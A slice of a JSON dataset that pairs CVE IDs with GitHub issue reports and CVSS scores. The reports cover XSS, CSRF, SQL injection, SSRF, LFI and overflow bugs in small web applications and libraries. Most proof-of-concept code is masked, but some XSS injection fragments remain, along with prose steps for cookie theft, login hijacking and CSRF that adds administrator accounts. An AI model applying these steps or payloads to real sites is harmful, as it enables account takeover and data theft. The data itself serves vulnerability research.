  52407. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/9",
  52408. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/9",
  52409. "Repo_new": "taosir/wtcms",
  52410. "Issue_Created_At": "2019-09-04T12:58:44Z",
  52411. "description": "Reflective XSS vulnerability exists in wtcms. Reflective XSS exists in keyword search area managed by administrator background articles url: URLTAG POC \"> APITAG <a src=\" FILETAG FILETAG",
  52412. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52413. "severity": "MEDIUM",
  52414. "baseScore": 5.4,
  52415. "impactScore": 2.7,
  52416. "exploitabilityScore": 2.3
  52417. },
  52418. {
  52419. "CVE_ID": "CVE-2020-20345",
  52420. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/10",
  52421. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/10",
  52422. "Repo_new": "taosir/wtcms",
  52423. "Issue_Created_At": "2019-09-04T13:48:48Z",
  52424. "description": "CSRF combines reflective XSS to obtain cookies. Reflective XSS exists in the administrator's page management office In the search box, enter \"> APITAG <a src=\" to trigger XSS FILETAG FILETAG Reuse CSRF vulnerability to obtain cookies FILETAG FILETAG FILETAG POC CODETAG",
  52425. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52426. "severity": "MEDIUM",
  52427. "baseScore": 5.4,
  52428. "impactScore": 2.7,
  52429. "exploitabilityScore": 2.3
  52430. },
  52431. {
  52432. "CVE_ID": "CVE-2020-20347",
  52433. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/11",
  52434. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/11",
  52435. "Repo_new": "taosir/wtcms",
  52436. "Issue_Created_At": "2019-09-05T11:45:33Z",
  52437. "description": "Storage XSS was found in three places. Three storage XSS were found in wtcms POC\uff1a APITAG APITAG on the background article management and fill in the XSS code at the source of the article FILETAG Find the published article in the front desk and click on the link to trigger XSS FILETAG FILETAG POC\uff1a APITAG APITAG on the background menu management, fill in the XSS code at the link, and finally click save FILETAG Find the location where the XSS code is inserted in the foreground and click to trigger the XSS attack FILETAG FILETAG POC\uff1a APITAG APITAG on the background links, fill in the XSS code at the link address, and finally click Save FILETAG Find the link address at the bottom of the front desk and click to trigger XSS FILETAG FILETAG",
  52438. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52439. "severity": "MEDIUM",
  52440. "baseScore": 5.4,
  52441. "impactScore": 2.7,
  52442. "exploitabilityScore": 2.3
  52443. },
  52444. {
  52445. "CVE_ID": "CVE-2020-20363",
  52446. "Issue_Url_old": "https://github.com/wind226/CVE/issues/1",
  52447. "Issue_Url_new": "https://github.com/wind226/cve/issues/1",
  52448. "Repo_new": "wind226/cve",
  52449. "Issue_Created_At": "2019-11-16T13:35:52Z",
  52450. "description": "Pbootcms background storage XSS. step1 Access admin page FILETAG step2 URLTAG FILETAG step3 FILETAG FILETAG ste4 XSS Trigger point FILETAG",
  52451. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  52452. "severity": "MEDIUM",
  52453. "baseScore": 4.8,
  52454. "impactScore": 2.7,
  52455. "exploitabilityScore": 1.7
  52456. },
  52457. {
  52458. "CVE_ID": "CVE-2020-20389",
  52459. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1321",
  52460. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1321",
  52461. "Repo_new": "getsimplecms/getsimplecms",
  52462. "Issue_Created_At": "2019-12-01T16:05:56Z",
  52463. "description": "Cross Site Scripting(XSS) Vulnerability in Latest Release NUMBERTAG a FILETAG . Hi, I would like to report Cross Site Scripting(XSS) vulnerability in latest APITAG FILETAG . Description: Cross site scripting (XSS) vulnerability in FILETAG url: FILETAG You can Edit html source code in rich text editor,and execute APITAG code. payload: ERRORTAG FILETAG And visit index page. FILETAG",
  52464. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  52465. "severity": "MEDIUM",
  52466. "baseScore": 4.8,
  52467. "impactScore": 2.7,
  52468. "exploitabilityScore": 1.7
  52469. },
  52470. {
  52471. "CVE_ID": "CVE-2020-20391",
  52472. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1322",
  52473. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1322",
  52474. "Repo_new": "getsimplecms/getsimplecms",
  52475. "Issue_Created_At": "2019-12-01T16:14:31Z",
  52476. "description": "Cross Site Scripting(XSS) Vulnerability in Latest Release NUMBERTAG a FILETAG . Hi, I would like to report Cross Site Scripting(XSS) vulnerability in latest APITAG FILETAG . Description: Cross site scripting (XSS) vulnerability in FILETAG url: FILETAG APITAG Snippet\u201d, input payload in snippets title payload: ERRORTAG and APITAG snippets\" FILETAG Last, visit FILETAG agin. FILETAG FILETAG",
  52477. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52478. "severity": "MEDIUM",
  52479. "baseScore": 5.4,
  52480. "impactScore": 2.7,
  52481. "exploitabilityScore": 2.3
  52482. },
  52483. {
  52484. "CVE_ID": "CVE-2020-20392",
  52485. "Issue_Url_old": "https://github.com/peacexie/imcat/issues/5",
  52486. "Issue_Url_new": "https://github.com/peacexie/imcat/issues/5",
  52487. "Repo_new": "peacexie/imcat",
  52488. "Issue_Created_At": "2020-08-02T17:12:20Z",
  52489. "description": "Sql injection vulnerability in Latest Release NUMBERTAG product reviews. Hi, I would like to report Sql injection vulnerability in latest release NUMBERTAG product PATHTAG I found it in the demo( URLTAG Add a product reviews FILETAG Test the fm FILETAG payload: APITAG FILETAG payload APITAG FILETAG",
  52490. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52491. "severity": "CRITICAL",
  52492. "baseScore": 9.8,
  52493. "impactScore": 5.9,
  52494. "exploitabilityScore": 3.9
  52495. },
  52496. {
  52497. "CVE_ID": "CVE-2020-20412",
  52498. "Issue_Url_old": "https://github.com/stepmania/stepmania/issues/1890",
  52499. "Issue_Url_new": "https://github.com/stepmania/stepmania/issues/1890",
  52500. "Repo_new": "stepmania/stepmania",
  52501. "Issue_Created_At": "2019-09-10T06:39:53Z",
  52502. "description": "APITAG NUMBERTAG crash report. Architecture : Window NUMBERTAG Crash reason : Access violation (invalid address NUMBERTAG f NUMBERTAG Crashed thread : APITAG NUMBERTAG g WARNING: Continuing a non continuable exception APITAG Access violation code c NUMBERTAG first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG mov eax,dword ptr [eax] ds NUMBERTAG b NUMBERTAG f NUMBERTAG dd NUMBERTAG f NUMBERTAG f NUMBERTAG fa NUMBERTAG fb2 ???????? ???????? ???????? ???????? ERRORTAG anaysis KEY_VALUES_STRING NUMBERTAG PROCESSES_ANALYSIS NUMBERTAG SERVICE_ANALYSIS NUMBERTAG STACKHASH_ANALYSIS NUMBERTAG TIMELINE_ANALYSIS NUMBERTAG Timeline: APITAG Name: APITAG Time NUMBERTAG APITAG Diff NUMBERTAG APITAG Timeline: APITAG Name: APITAG Time NUMBERTAG T NUMBERTAG Z Diff NUMBERTAG APITAG Timeline: APITAG Name: APITAG Time NUMBERTAG T NUMBERTAG Z Diff NUMBERTAG APITAG Timeline: APITAG Name: APITAG Time NUMBERTAG T NUMBERTAG Z Diff NUMBERTAG APITAG DUMP_CLASS NUMBERTAG DUMP_QUALIFIER NUMBERTAG FAULTING_IP: APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG mov eax,dword ptr [eax] EXCEPTION_RECORD: (.exr NUMBERTAG APITAG NUMBERTAG b NUMBERTAG APITAG APITAG c NUMBERTAG APITAG violation) APITAG NUMBERTAG APITAG NUMBERTAG Parameter NUMBERTAG Parameter NUMBERTAG f NUMBERTAG Attempt to read from address NUMBERTAG f NUMBERTAG FAULTING_THREAD NUMBERTAG e3c DEFAULT_BUCKET_ID: INVALID_POINTER_READ PROCESS_NAME: FILETAG FOLLOWUP_IP: APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG mov eax,dword ptr [eax] READ_ADDRESS NUMBERTAG f NUMBERTAG ERROR_CODE: (NTSTATUS NUMBERTAG c NUMBERTAG APITAG to get error code text> EXCEPTION_CODE: (NTSTATUS NUMBERTAG c NUMBERTAG APITAG to get error code text> EXCEPTION_CODE_STR: c NUMBERTAG EXCEPTION_PARAMETER NUMBERTAG EXCEPTION_PARAMETER NUMBERTAG f NUMBERTAG WATSON_BKT_PROCSTAMP NUMBERTAG ad1b NUMBERTAG WATSON_BKT_PROCVER NUMBERTAG PROCESS_VER_PRODUCT: APITAG WATSON_BKT_MODULE: ntdll.dll WATSON_BKT_MODSTAMP NUMBERTAG ddde NUMBERTAG WATSON_BKT_MODOFFSET NUMBERTAG WATSON_BKT_MODVER NUMBERTAG BUILD_VERSION_STRING: APITAG NUMBERTAG MODLIST_WITH_TSCHKSUM_HASH: APITAG MODLIST_SHA1_HASH: APITAG NTGLOBALFLAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APPLICATION_VERIFIER_FLAGS NUMBERTAG PRODUCT_TYPE NUMBERTAG SUITE_MASK NUMBERTAG DUMP_TYPE: fe ANALYSIS_SESSION_HOST: DESKTOP BLBI ANALYSIS_SESSION_TIME NUMBERTAG APITAG ANALYSIS_VERSION NUMBERTAG amd NUMBERTAG fre THREAD_ATTRIBUTES: OS_LOCALE: KOR BUGCHECK_STR: APITAG PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT PROBLEM_CLASSES: ID NUMBERTAG n NUMBERTAG Type: [ APITAG Class: Addendum Scope: BUCKET_ID Name: Omit Data: Omit PID: APITAG TID NUMBERTAG e3c] Frame NUMBERTAG APITAG ID NUMBERTAG n NUMBERTAG Type: [INVALID_POINTER_READ] Class: Primary Scope: DEFAULT_BUCKET_ID APITAG Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: APITAG TID NUMBERTAG e3c] Frame NUMBERTAG APITAG ID NUMBERTAG n NUMBERTAG Type: [ZEROED_STACK] Class: Addendum Scope: BUCKET_ID Name: Add Data: Omit PID NUMBERTAG TID NUMBERTAG e3c] Frame NUMBERTAG APITAG LAST_CONTROL_TRANSFER: from NUMBERTAG b NUMBERTAG c1 to NUMBERTAG b NUMBERTAG STACK_TEXT NUMBERTAG ff NUMBERTAG b NUMBERTAG c NUMBERTAG a2de NUMBERTAG a2de NUMBERTAG fcc APITAG NUMBERTAG ff9dc NUMBERTAG e NUMBERTAG c NUMBERTAG a2de8 APITAG NUMBERTAG ffa NUMBERTAG ea6fc NUMBERTAG ffb NUMBERTAG ffbb8 APITAG NUMBERTAG ffa NUMBERTAG fde NUMBERTAG c NUMBERTAG ca NUMBERTAG e0 APITAG WARNING: Stack unwind information not available. Following frames may be wrong NUMBERTAG ffa6c NUMBERTAG f NUMBERTAG e NUMBERTAG ca NUMBERTAG e NUMBERTAG ffaf NUMBERTAG b8b APITAG NUMBERTAG ffa NUMBERTAG b8b NUMBERTAG ca NUMBERTAG e NUMBERTAG b8fc NUMBERTAG APITAG NUMBERTAG ffaf NUMBERTAG c NUMBERTAG ffbb NUMBERTAG ffb NUMBERTAG ffb NUMBERTAG APITAG NUMBERTAG ffb5c NUMBERTAG ec NUMBERTAG ffbb NUMBERTAG APITAG NUMBERTAG ffb NUMBERTAG e NUMBERTAG a NUMBERTAG ffbb NUMBERTAG ffba NUMBERTAG ffb9c APITAG NUMBERTAG ffbe NUMBERTAG dfbf NUMBERTAG b8fc4aa NUMBERTAG fc3c NUMBERTAG APITAG NUMBERTAG ffc NUMBERTAG d NUMBERTAG ef NUMBERTAG f NUMBERTAG a NUMBERTAG b8fc4e6 APITAG NUMBERTAG ffc NUMBERTAG fd2fc NUMBERTAG b8fc5a NUMBERTAG a NUMBERTAG c4 APITAG NUMBERTAG ffd0c NUMBERTAG e2d NUMBERTAG f NUMBERTAG ffd NUMBERTAG APITAG NUMBERTAG ffd NUMBERTAG e NUMBERTAG c3fdd APITAG NUMBERTAG ffd NUMBERTAG c NUMBERTAG df NUMBERTAG c NUMBERTAG ffddc APITAG NUMBERTAG ffd NUMBERTAG d NUMBERTAG d NUMBERTAG df NUMBERTAG fa NUMBERTAG e NUMBERTAG APITAG NUMBERTAG ffddc NUMBERTAG d NUMBERTAG fd ffffffff NUMBERTAG f NUMBERTAG c NUMBERTAG APITAG NUMBERTAG ffdec NUMBERTAG e7b NUMBERTAG df NUMBERTAG APITAG STACK_COMMAND NUMBERTAG s ; .cxr ; kb THREAD_SHA1_HASH_MOD_FUNC: APITAG APITAG APITAG THREAD_SHA1_HASH_MOD: APITAG FAULT_INSTR_CODE NUMBERTAG b NUMBERTAG b SYMBOL_STACK_INDE NUMBERTAG SYMBOL_NAME: APITAG FOLLOWUP_NAME: APITAG MODULE_NAME: ntdll NUMBERTAG IMAGE_NAME: ntdll.dll DEBUG_FLR_IMAGE_TIMESTAMP NUMBERTAG ddde NUMBERTAG FAILURE_BUCKET_ID: APITAG BUCKET_ID: APITAG FAILURE_EXCEPTION_CODE: c NUMBERTAG FAILURE_IMAGE_NAME: ntdll.dll BUCKET_ID_IMAGE_STR: ntdll.dll FAILURE_MODULE_NAME: ntdll NUMBERTAG BUCKET_ID_MODULE_STR: ntdll NUMBERTAG FAILURE_FUNCTION_NAME: APITAG BUCKET_ID_FUNCTION_STR: APITAG BUCKET_ID_OFFSET NUMBERTAG a2 BUCKET_ID_MODTIMEDATESTAMP NUMBERTAG ddde NUMBERTAG BUCKET_ID_MODCHECKSUM NUMBERTAG a NUMBERTAG d BUCKET_ID_MODVER_STR NUMBERTAG BUCKET_ID_PREFIX_STR: APITAG FAILURE_PROBLEM_CLASS: APPLICATION_FAULT FAILURE_SYMBOL_NAME: APITAG WATSON_STAGEONE_URL: URLTAG TARGET_TIME NUMBERTAG APITAG OSBUILD NUMBERTAG OSSERVICEPACK NUMBERTAG SERVICEPACK_NUMBER NUMBERTAG OS_REVISION NUMBERTAG OSPLATFORM_TYPE NUMBERTAG OSNAME: Windows NUMBERTAG OSEDITION: Windows NUMBERTAG APITAG APITAG USER_LCID NUMBERTAG OSBUILD_TIMESTAMP: unknown_date BUILDDATESTAMP_STR NUMBERTAG BUILDLAB_STR: rs5_release BUILDOSVER_STR: APITAG NUMBERTAG APITAG NUMBERTAG ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: APITAG FAILURE_ID_HASH: {d7fe NUMBERTAG f NUMBERTAG f NUMBERTAG f5d1b2edc8b}",
  52503. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  52504. "severity": "MEDIUM",
  52505. "baseScore": 6.5,
  52506. "impactScore": 3.6,
  52507. "exploitabilityScore": 2.8
  52508. },
  52509. {
  52510. "CVE_ID": "CVE-2020-20425",
  52511. "Issue_Url_old": "https://github.com/Sea0o/vulnerability/issues/1",
  52512. "Issue_Url_new": "https://github.com/str1am/vulnerability/issues/1",
  52513. "Repo_new": "str1am/vulnerability",
  52514. "Issue_Created_At": "2019-10-17T02:00:20Z",
  52515. "description": "s cms Government station building system exists XSS. \u6253\u5f00\u9996\u9875 FILETAG \u70b9\u51fb\u653f\u5e9c\u5efa\u7ad9\u7cfb\u7edf\u5f97\u9884\u89c8\uff0c\u8fdb\u5165\u9884\u89c8\u7f51\u7ad9 FILETAG APITAG APITAG \u6210\u529f\u5f39\u7a97 FILETAG FILETAG",
  52516. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52517. "severity": "MEDIUM",
  52518. "baseScore": 6.1,
  52519. "impactScore": 2.7,
  52520. "exploitabilityScore": 2.8
  52521. },
  52522. {
  52523. "CVE_ID": "CVE-2020-20426",
  52524. "Issue_Url_old": "https://github.com/Sea0o/vulnerability/issues/2",
  52525. "Issue_Url_new": "https://github.com/str1am/vulnerability/issues/2",
  52526. "Repo_new": "str1am/vulnerability",
  52527. "Issue_Created_At": "2019-10-17T03:38:39Z",
  52528. "description": "s cms Multiple XSS exist in / function / FILETAG in Government station building system. in / function / FILETAG , FILETAG FILETAG APITAG payload\uff1a FILETAG POST\uff1aG_title=\"> APITAG &G_mail= EMAILTAG &G_phone NUMBERTAG FILETAG POST\uff1aG_name=\"> APITAG &G_mail= EMAILTAG &G_phone NUMBERTAG FILETAG POST\uff1aG_msg=\"> APITAG &G_mail= EMAILTAG &G_phone NUMBERTAG FILETAG",
  52529. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52530. "severity": "MEDIUM",
  52531. "baseScore": 6.1,
  52532. "impactScore": 2.7,
  52533. "exploitabilityScore": 2.8
  52534. },
  52535. {
  52536. "CVE_ID": "CVE-2020-20444",
  52537. "Issue_Url_old": "https://github.com/jact/openclinic/issues/8",
  52538. "Issue_Url_new": "https://github.com/jact/openclinic/issues/8",
  52539. "Repo_new": "jact/openclinic",
  52540. "Issue_Created_At": "2019-09-15T01:19:29Z",
  52541. "description": "LFI on APITAG Admin. APITAG : FILETAG Impact : Anyone login to the the admin account can read files from server like config and maybe can get RCE URLTAG . Fix : remove the FILETAG or you can blacklist the dot and slashes . Hitman APITAG | Blackfoxs Team .",
  52542. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  52543. "severity": "HIGH",
  52544. "baseScore": 7.2,
  52545. "impactScore": 5.9,
  52546. "exploitabilityScore": 1.2
  52547. },
  52548. {
  52549. "CVE_ID": "CVE-2020-20486",
  52550. "Issue_Url_old": "https://github.com/airpig2011/IEC104/issues/14",
  52551. "Issue_Url_new": "https://github.com/airpig2011/iec104/issues/14",
  52552. "Repo_new": "airpig2011/iec104",
  52553. "Issue_Created_At": "2019-09-23T11:15:59Z",
  52554. "description": "stack buffer overflow at APITAG Hi there, __stack buffer overflow__ in APITAG Snip APITAG ERRORTAG ASAN OUTPUT ERRORTAG",
  52555. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  52556. "severity": "HIGH",
  52557. "baseScore": 7.5,
  52558. "impactScore": 3.6,
  52559. "exploitabilityScore": 3.9
  52560. },
  52561. {
  52562. "CVE_ID": "CVE-2020-20490",
  52563. "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/5",
  52564. "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/5",
  52565. "Repo_new": "fcovatti/libiec_iccp_mod",
  52566. "Issue_Created_At": "2019-10-10T06:21:33Z",
  52567. "description": "Heap buffer overflow found in client_example1.c. Hello, I found a potential heap buffer overflow in PATHTAG seems in some case when the packet can not be accept, the program throw cause heap buffer overflow. APITAG are steps followed to reproduce crash__ Download latest source code from: PATHTAG compiled with clang and ASAN APITAG before make ASAN Output: ERRORTAG",
  52568. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  52569. "severity": "HIGH",
  52570. "baseScore": 7.5,
  52571. "impactScore": 3.6,
  52572. "exploitabilityScore": 3.9
  52573. },
  52574. {
  52575. "CVE_ID": "CVE-2020-20495",
  52576. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1246",
  52577. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1246",
  52578. "Repo_new": "bludit/bludit",
  52579. "Issue_Created_At": "2020-07-31T01:29:29Z",
  52580. "description": "Arbitrary zip file deletion vulnerability in backup plugin. bludit NUMBERTAG has a arbitrary zip file deletion vulnerability in backup plugin NUMBERTAG put a ' FILETAG ' in root directory FILETAG NUMBERTAG replace cookie and APITAG and repeat the post data . CODETAG NUMBERTAG can see the install.zip had deleted . FILETAG",
  52581. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  52582. "severity": "CRITICAL",
  52583. "baseScore": 9.1,
  52584. "impactScore": 5.2,
  52585. "exploitabilityScore": 3.9
  52586. },
  52587. {
  52588. "CVE_ID": "CVE-2020-20508",
  52589. "Issue_Url_old": "https://github.com/samnabi/shopkit/issues/223",
  52590. "Issue_Url_new": "https://github.com/samnabi/shopkit/issues/223",
  52591. "Repo_new": "samnabi/shopkit",
  52592. "Issue_Created_At": "2019-09-23T04:34:50Z",
  52593. "description": "Login hijacking in register. In the latest version NUMBERTAG First,I found a reflective XSS vulnerability in register. The payload is: ERRORTAG FILETAG Then,I fount this XSS vulnerability could cause login hijacking The payload is: CODETAG When the user enters a username via this link,as shown below FILETAG Then click on the \"log in\" The username and password will be submitted to my link. FILETAG",
  52594. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52595. "severity": "MEDIUM",
  52596. "baseScore": 6.1,
  52597. "impactScore": 2.7,
  52598. "exploitabilityScore": 2.8
  52599. },
  52600. {
  52601. "CVE_ID": "CVE-2020-20514",
  52602. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/76",
  52603. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/76",
  52604. "Repo_new": "magicblack/maccms10",
  52605. "Issue_Created_At": "2019-10-22T12:07:51Z",
  52606. "description": "There is a CSRF vulnerability that can del the administrator account. After the administrator logged in, open the following page. POC: CODETAG Then administrator users numbered NUMBERTAG will be deleted. If the administrators are all deleted, no one can log in.",
  52607. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  52608. "severity": "HIGH",
  52609. "baseScore": 8.1,
  52610. "impactScore": 5.2,
  52611. "exploitabilityScore": 2.8
  52612. },
  52613. {
  52614. "CVE_ID": "CVE-2020-20582",
  52615. "Issue_Url_old": "https://github.com/sansanyun/mipcms5/issues/5",
  52616. "Issue_Url_new": "https://github.com/sansanyun/mipjz/issues/5",
  52617. "Repo_new": "sansanyun/mipjz",
  52618. "Issue_Created_At": "2019-09-29T07:35:36Z",
  52619. "description": "There is one SSRF vulnerability that can get some sensitive information. Vulnerability location\uff1a APITAG \uff1a FILETAG The problem arises in line NUMBERTAG CODETAG Using curl_exec, APITAG is controllable and only trim is made to the APITAG parameter in the above code without any filtering, and finally the json encoded data is returned. poc: APITAG FILETAG",
  52620. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  52621. "severity": "HIGH",
  52622. "baseScore": 7.5,
  52623. "impactScore": 3.6,
  52624. "exploitabilityScore": 3.9
  52625. },
  52626. {
  52627. "CVE_ID": "CVE-2020-20583",
  52628. "Issue_Url_old": "https://github.com/0xyu/PHP_Learning/issues/1",
  52629. "Issue_Url_new": "https://github.com/0xyu/php_learning/issues/1",
  52630. "Repo_new": "0xyu/PHP_Learning",
  52631. "Issue_Created_At": "2019-10-02T09:59:14Z",
  52632. "description": "LJCMS Version NUMBERTAG R NUMBERTAG SQL Injection (latest version). Vulnerability Name: LJCMS Version NUMBERTAG R NUMBERTAG FILETAG SQL Injection (latest version) Product Homepage: FILETAG Software link: FILETAG Version NUMBERTAG Location PATHTAG Code \uff1a ERRORTAG \u5728sql\u8bed\u53e5 APITAG The parameters APITAG and APITAG are not wrapped in single quotes. Although the global check for gpc is enabled, and the way to post, get, cookie, etc. is passed, addslashes , but there will be no Defensive measures can be injected in queid or topicid . Test\uff1a FILETAG POC: APITAG",
  52633. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  52634. "severity": "HIGH",
  52635. "baseScore": 7.5,
  52636. "impactScore": 3.6,
  52637. "exploitabilityScore": 3.9
  52638. },
  52639. {
  52640. "CVE_ID": "CVE-2020-20584",
  52641. "Issue_Url_old": "https://github.com/baigoStudio/baigoSSO/issues/13",
  52642. "Issue_Url_new": "https://github.com/baigostudio/baigosso/issues/13",
  52643. "Repo_new": "baigostudio/baigosso",
  52644. "Issue_Created_At": "2019-10-10T12:40:40Z",
  52645. "description": "There is a stored XSS vulnerability. Vulnerability description A xss vulnerability was discovered in APITAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form(admin_nick) parameter post to the PATHTAG POC: xss payload: APITAG CODETAG Submit this form, after refreshing, you can find that our xss statement was successfully executed. FILETAG FILETAG FILETAG FILETAG Vulnerability Analysis PATHTAG APITAG Line NUMBERTAG It filters the content on the input. FILETAG FILETAG Continue to follow up on this process FILETAG Because the incoming argument is an array, it will go into the APITAG method of line NUMBERTAG FILETAG FILETAG In the NUMBERTAG line, enter the safe function to filter the input content. FILETAG FILETAG Filtering the input content by xss and sql APITAG we can bypass this. payload: APITAG",
  52646. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52647. "severity": "MEDIUM",
  52648. "baseScore": 6.1,
  52649. "impactScore": 2.7,
  52650. "exploitabilityScore": 2.8
  52651. },
  52652. {
  52653. "CVE_ID": "CVE-2020-20585",
  52654. "Issue_Url_old": "https://github.com/0xyu/PHP_Learning/issues/3",
  52655. "Issue_Url_new": "https://github.com/0xyu/php_learning/issues/3",
  52656. "Repo_new": "0xyu/PHP_Learning",
  52657. "Issue_Created_At": "2019-10-15T08:04:08Z",
  52658. "description": "Metinfo NUMBERTAG APITAG . Vulnerability Name: Metinfo CMS Background SQL Union Select Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG PATHTAG Line NUMBERTAG ERRORTAG APITAG The input parameters are only filtered by addslashes, but the package is not used during the stitching process. payload: first: Get the id of the data record at APITAG FILETAG second\uff1a\uff1b poc: APITAG post\uff1a CODETAG If the deletion of this poc fails, the first version of the mysql version number is NUMBERTAG if the deletion is successful, the first version of the mysql version number is not NUMBERTAG FILETAG If set the code as NUMBERTAG we can find delete the log data success. FILETAG",
  52659. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  52660. "severity": "HIGH",
  52661. "baseScore": 7.5,
  52662. "impactScore": 3.6,
  52663. "exploitabilityScore": 3.9
  52664. },
  52665. {
  52666. "CVE_ID": "CVE-2020-20586",
  52667. "Issue_Url_old": "https://github.com/0xyu/PHP_Learning/issues/4",
  52668. "Issue_Url_new": "https://github.com/0xyu/php_learning/issues/4",
  52669. "Repo_new": "0xyu/PHP_Learning",
  52670. "Issue_Created_At": "2019-10-16T06:41:13Z",
  52671. "description": "XYHCMS NUMBERTAG CSRF. Hi, I would like to report CSRF vulnerability in XYHCMS NUMBERTAG There is a CSRF vulnerability that can change any information (name, email, password, etc.) of the administrator. POC: APITAG to administrator panel NUMBERTAG open FILETAG ERRORTAG eg: APITAG modification FILETAG NUMBERTAG open FILETAG APITAG modification FILETAG",
  52672. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N",
  52673. "severity": "MEDIUM",
  52674. "baseScore": 4.5,
  52675. "impactScore": 3.6,
  52676. "exploitabilityScore": 0.9
  52677. },
  52678. {
  52679. "CVE_ID": "CVE-2020-20593",
  52680. "Issue_Url_old": "https://github.com/alixiaowei/alixiaowei.github.io/issues/1",
  52681. "Issue_Url_new": "https://github.com/alixiaowei/alixiaowei.github.io/issues/1",
  52682. "Repo_new": "alixiaowei/alixiaowei.github.io",
  52683. "Issue_Created_At": "2019-10-13T06:17:06Z",
  52684. "description": "There is one CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following page poc\uff1a APITAG add a adminuser CODETAG",
  52685. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  52686. "severity": "HIGH",
  52687. "baseScore": 8.0,
  52688. "impactScore": 5.9,
  52689. "exploitabilityScore": 2.1
  52690. },
  52691. {
  52692. "CVE_ID": "CVE-2020-20595",
  52693. "Issue_Url_old": "https://github.com/lock-upme/OPMS/issues/25",
  52694. "Issue_Url_new": "https://github.com/lock-upme/opms/issues/25",
  52695. "Repo_new": "lock-upme/opms",
  52696. "Issue_Created_At": "2019-10-14T15:18:42Z",
  52697. "description": "There is one CSRF vulnerability that can add the account . Place of backstage set up Organization management exists Csrf Vulnerability,attacker Structure a csrf APITAG the administrator clicks on the malicious link, add a user CSRF Exp: CODETAG We can construct the csrf code, so that after the webmaster clicks on the malicious link of the attacker, it will execute csrf, As long as the administrator visits can add user. FILETAG FILETAG",
  52698. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  52699. "severity": "MEDIUM",
  52700. "baseScore": 6.5,
  52701. "impactScore": 3.6,
  52702. "exploitabilityScore": 2.8
  52703. },
  52704. {
  52705. "CVE_ID": "CVE-2020-20597",
  52706. "Issue_Url_old": "https://github.com/xuhuisheng/lemon/issues/198",
  52707. "Issue_Url_new": "https://github.com/xuhuisheng/lemon/issues/198",
  52708. "Repo_new": "xuhuisheng/lemon",
  52709. "Issue_Created_At": "2019-10-15T07:55:26Z",
  52710. "description": "lemon \u5b58\u5728\u5b58\u50a8\u578bXSS. \u60a8\u597d\uff0c\u6211\u5728lemon NUMBERTAG SS \u6709\u6548\u8d1f\u8377\uff1a APITAG alert('cookie') APITAG PATHTAG line NUMBERTAG ERRORTAG APITAG \u5229\u7528\uff1a APITAG POC CODETAG \u7ed3\u679c\uff1a \u6267\u884c\u4e86js\u8bed\u53e5\uff0c\u5e76\u5f39\u6846 FILETAG",
